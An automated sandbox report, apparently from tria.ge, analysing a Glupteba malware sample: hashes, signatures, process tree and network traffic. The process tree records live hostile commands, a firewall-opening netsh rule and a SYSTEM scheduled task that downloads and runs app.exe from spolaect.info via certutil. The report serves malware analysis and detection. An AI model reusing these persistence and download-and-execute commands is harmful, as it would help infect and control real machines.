Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
5s -
max time network
165s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31/12/2023, 03:26 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2654d11f2d3ce974e432ad1c84bcd1f7.exe
Resource
win7-20231215-en
General
-
Target
2654d11f2d3ce974e432ad1c84bcd1f7.exe
-
Size
4.5MB
-
MD5
2654d11f2d3ce974e432ad1c84bcd1f7
-
SHA1
053efdc46790dd1b49e93863df59c83c39342c8f
-
SHA256
df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51
-
SHA512
8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7
-
SSDEEP
98304:UvcNtBvoJc7I0r0fy0hqQRi69numaD09pJ6N5f1qlFBdWiBl5E1oz2tiuD:UkJtjr0fXRi65rwfCFTZteoz2B
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 18 IoCs
resource yara_rule behavioral1/memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp family_glupteba behavioral1/memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp family_glupteba behavioral1/memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp family_glupteba behavioral1/memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2636 netsh.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2792 schtasks.exe 368 schtasks.exe -
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 28 Go-http-client/1.1 HTTP User-Agent header 29 Go-http-client/1.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"1⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"2⤵PID:2848
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵PID:2580
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /51-513⤵PID:2504
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:2792
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:368
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵PID:2356
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240102022855.log C:\Windows\Logs\CBS\CbsPersist_20240102022855.cab1⤵PID:2404
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:2636
Network
-
Remote address:8.8.8.8:53Requestninhaine.comIN TXTResponse
-
Remote address:8.8.8.8:53Request2makestorage.comIN TXTResponse
-
Remote address:8.8.8.8:53Request2makestorage.comIN TXT
-
Remote address:8.8.8.8:53Request2makestorage.comIN TXT
-
Remote address:8.8.8.8:53Requestnisdably.comIN TXTResponsenisdably.comIN TXT.v=spf1 include:_incspfcheck.mailspike.net ?all
-
Remote address:8.8.8.8:53Requestnisdably.comIN TXT
-
Remote address:8.8.8.8:53Request7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.comIN TXTResponse
-
Remote address:8.8.8.8:53Requestserver2.ninhaine.comIN AResponseserver2.ninhaine.comIN A46.8.8.100
-
Remote address:8.8.8.8:53Requestserver2.ninhaine.comIN A
-
Remote address:8.8.8.8:53Requestapps.identrust.comIN AResponseapps.identrust.comIN CNAMEidentrust.edgesuite.netidentrust.edgesuite.netIN CNAMEa1952.dscq.akamai.neta1952.dscq.akamai.netIN A96.17.179.184a1952.dscq.akamai.netIN A96.17.179.205
-
Remote address:8.8.8.8:53Requestapps.identrust.comIN A
-
Remote address:8.8.8.8:53Requestapps.identrust.comIN AResponseapps.identrust.comIN CNAMEidentrust.edgesuite.netidentrust.edgesuite.netIN CNAMEa1952.dscq.akamai.neta1952.dscq.akamai.netIN A96.17.179.184a1952.dscq.akamai.netIN A96.17.179.205
-
Remote address:8.8.8.8:53Requestapps.identrust.comIN A
-
Remote address:8.8.8.8:53Requestapps.identrust.comIN A
-
Remote address:8.8.8.8:53Requestmsdl.microsoft.comIN AResponsemsdl.microsoft.comIN CNAMEmsdl.microsoft.akadns.netmsdl.microsoft.akadns.netIN CNAMEmsdl-microsoft-com.a-0016.a-msedge.netmsdl-microsoft-com.a-0016.a-msedge.netIN CNAMEa-0016.a-msedge.neta-0016.a-msedge.netIN A204.79.197.219
-
Remote address:96.17.179.184:80RequestGET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
ResponseHTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Tue, 02 Jan 2024 03:29:47 GMT
Date: Tue, 02 Jan 2024 02:29:47 GMT
Connection: keep-alive
-
Remote address:96.17.179.184:80RequestGET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
ResponseHTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Tue, 02 Jan 2024 03:29:49 GMT
Date: Tue, 02 Jan 2024 02:29:49 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A92.123.241.137
-
Remote address:8.8.8.8:53Requestww82.ninhaine.comIN AResponseww82.ninhaine.comIN CNAME63214.bodis.com63214.bodis.comIN A199.59.243.225
-
Remote address:8.8.8.8:53Requestww82.ninhaine.comIN A
-
Remote address:8.8.8.8:53Requestww82.ninhaine.comIN A
-
Remote address:8.8.8.8:53Requestww82.ninhaine.comIN A
-
Remote address:199.59.243.225:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: ec1b3501-b497-4488-97f4-079e9a224a28
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=ec1b3501-b497-4488-97f4-079e9a224a28; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
-
Remote address:199.59.243.225:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: aea5f282-ebbf-4187-8753-3328666798f3
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PWYaEjx1WLab74ULRf6Jk7/LR73s9JiUTVCBBaovLQ9NfKj4K53i5rfcUyBtNPKTbRb0vLBnSDmDHwZzWPyBTA==
set-cookie: parking_session=aea5f282-ebbf-4187-8753-3328666798f3; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
-
Remote address:199.59.243.225:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: 77140089-0927-465a-ac53-e3d498537c8d
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TeqaaDzaGkh++CO3S2rcAD+HiwCyxodbqjX0AgEelFwPnTwWZi+A6QzfdPwL/iC6OYYBvcgXGbWB/P0ZEczIcQ==
set-cookie: parking_session=77140089-0927-465a-ac53-e3d498537c8d; expires=Tue, 02 Jan 2024 02:44:58 GMT; path=/
-
Remote address:199.59.243.225:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: 8b263e78-fd1c-4205-8c2c-64046dd374fd
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ppx9vxY7pmKhVFjR3+KyMhuE2D1SlyAf7U9Eg/jAKoTo2ogcFYqti0wYsjkE25HHFUyy7CruXr2Oi10jSAWC9g==
set-cookie: parking_session=8b263e78-fd1c-4205-8c2c-64046dd374fd; expires=Tue, 02 Jan 2024 02:44:59 GMT; path=/
-
Remote address:199.59.243.225:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe; expires=Tue, 02 Jan 2024 02:45:01 GMT; path=/
-
Remote address:8.8.8.8:53Requestvsblobprodscussu5shard30.blob.core.windows.netIN AResponsevsblobprodscussu5shard30.blob.core.windows.netIN CNAMEblob.sat09prdstrz08a.store.core.windows.netblob.sat09prdstrz08a.store.core.windows.netIN CNAMEblob.SAT09PrdStrz08A.trafficmanager.netblob.SAT09PrdStrz08A.trafficmanager.netIN A20.150.79.68blob.SAT09PrdStrz08A.trafficmanager.netIN A20.150.70.36blob.SAT09PrdStrz08A.trafficmanager.netIN A20.150.38.228
-
1.1kB 5.1kB 12 13
-
152 B 3
-
1.9kB 5.1kB 13 14
-
1.1kB 4.9kB 14 9
-
1.9kB 8.0kB 15 16
-
369 B 1.6kB 5 4
HTTP Request
GET http://apps.identrust.com/roots/dstrootcax3.p7cHTTP Response
200 -
727 B 1.6kB 7 4
HTTP Request
GET http://apps.identrust.com/roots/dstrootcax3.p7cHTTP Response
200 -
1.1kB 5.0kB 16 10
-
1.3kB 236 B 10 5
-
14.9kB 8.7kB 30 27
-
836 B 4.9kB 10 10
-
565 B 2.5kB 9 7
HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200 -
1.5kB 8.9kB 16 17
HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200 -
4.8kB 6.2kB 31 24
-
21.1kB 989.7kB 427 713
-
58 B 58 B 1 1
DNS Request
ninhaine.com
-
186 B 135 B 3 1
DNS Request
2makestorage.com
DNS Request
2makestorage.com
DNS Request
2makestorage.com
-
116 B 117 B 2 1
DNS Request
nisdably.com
DNS Request
nisdably.com
-
95 B 95 B 1 1
DNS Request
7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com
-
132 B 82 B 2 1
DNS Request
server2.ninhaine.com
DNS Request
server2.ninhaine.com
DNS Response
46.8.8.100
-
128 B 165 B 2 1
DNS Request
apps.identrust.com
DNS Request
apps.identrust.com
DNS Response
96.17.179.18496.17.179.205
-
192 B 165 B 3 1
DNS Request
apps.identrust.com
DNS Request
apps.identrust.com
DNS Request
apps.identrust.com
DNS Response
96.17.179.18496.17.179.205
-
64 B 182 B 1 1
DNS Request
msdl.microsoft.com
DNS Response
204.79.197.219
-
63 B 230 B 1 1
DNS Request
www.microsoft.com
DNS Response
92.123.241.137
-
252 B 105 B 4 1
DNS Request
ww82.ninhaine.com
DNS Request
ww82.ninhaine.com
DNS Request
ww82.ninhaine.com
DNS Request
ww82.ninhaine.com
DNS Response
199.59.243.225
-
92 B 231 B 1 1
DNS Request
vsblobprodscussu5shard30.blob.core.windows.net
DNS Response
20.150.79.6820.150.70.3620.150.38.228